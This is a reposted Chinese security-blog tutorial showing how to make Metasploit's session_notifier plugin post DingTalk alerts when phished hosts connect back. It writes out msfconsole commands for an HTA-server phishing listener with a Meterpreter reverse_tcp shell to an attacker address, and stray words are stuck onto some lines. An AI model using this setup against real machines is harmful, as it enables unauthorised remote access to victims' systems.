Metasploit主機上線釘釘通知

聲明: 該公衆號大部分文章來自做者平常學習筆記,也有少部分文章是通過原做者受權和其餘公衆號白名單轉載,未經受權,嚴禁轉載,如需轉載,聯繫開白。
請勿利用文章內的相關技術從事非法測試,如所以產生的一切不良後果與文章做者和本公衆號無關。

全部話題標籤:#Web安全   #漏洞復現   #工具使用   #權限提高#權限維持   #防禦繞過   #內網安全   #實戰案例    #其餘筆記   #資源分享   #MSFjavascript


0x01 前言java

咱們在進行釣魚攻擊 被動提權 時可能須要在MSF長期監聽某個端口,等待管理員執行上線,但又不可能隨時都盯着監聽界面,這樣就不能及時得知是否有新主機上線,是否是很不方便呢?

最近在metasploit-framework項目中看到安恆 @三米前有蕉皮 老哥提交的「釘釘通知」拉取請求,現已被rapid7合併到了session_notifier會話通知插件中。
  • https://github.com/rapid7/metasploit-framework/pull/13571git


0x01 釘釘機器人webhook配置github

咱們先在釘釘官網下載Windows客戶端並註冊一個用戶進行登陸,而後發起一個羣組並在羣設置中的智能助手裏添加一個自定義機器人。

機器人的名稱能夠隨便取,在安全設置中添加一個自定義關鍵字「session」,這是一個不能修改的固定值。


0x02 session_notifier插件配置web

msfconole命令進入MSF後先用load加載session_notifier插件,將set_session_dingtalk_webhook設置爲咱們釘釘機器人中的Webhook,而後用start_session_notifier命令開啓會話通知便可。
root@:kali~# msfconsole -qmsf6 > load session_notifiermsf6 > set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?access_token=msf6 > start_session_notifier


SessionNotifier Commands:
restart_session_notifier //從新啓動會話通知save_session_notifier_settings //將全部會話通知設置保存到框架set_session_dingtalk_webhook //設置DingTalk會話通知(關鍵字: session)set_session_maximum_ip //設置會話通知最大IP範圍set_session_minimum_ip //設置會話通知最小IP範圍set_session_mobile_carrier //設置手機的移動運營商set_session_mobile_number //設置您要通知的10位手機號碼set_session_smtp_address //設置會話通知SMTP地址set_session_smtp_from //設置SMTP發件人set_session_smtp_password //設置SMTP密碼set_session_smtp_port //設置會話通知SMTP端口set_session_smtp_username //設置SMTP用戶名start_session_notifier //開始會話通知stop_session_notifier //中止會話通知

隨便設置了一個hta_server監聽模塊來測試一下看是否可以實時收到新上線主機的通知。
windows

msf6 > use exploit/windows/misc/hta_server msf6 exploit(windows/misc/hta_server) > set target 1msf6 exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(windows/misc/hta_server) > set lhost 39.**.*.238msf6 exploit(windows/misc/hta_server) > set lport 443msf6 exploit(windows/misc/hta_server) > exploit


這裏咱們能夠看到釘釘羣組裏已經成功收到了機器人發送過來的新上線主機通知信息!api


禁止非法,後果自負安全

歡迎關注公衆號:web安全工具庫微信


本文分享自微信公衆號 - web安全工具庫(websec-tools)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。session

相關文章
相關標籤/搜索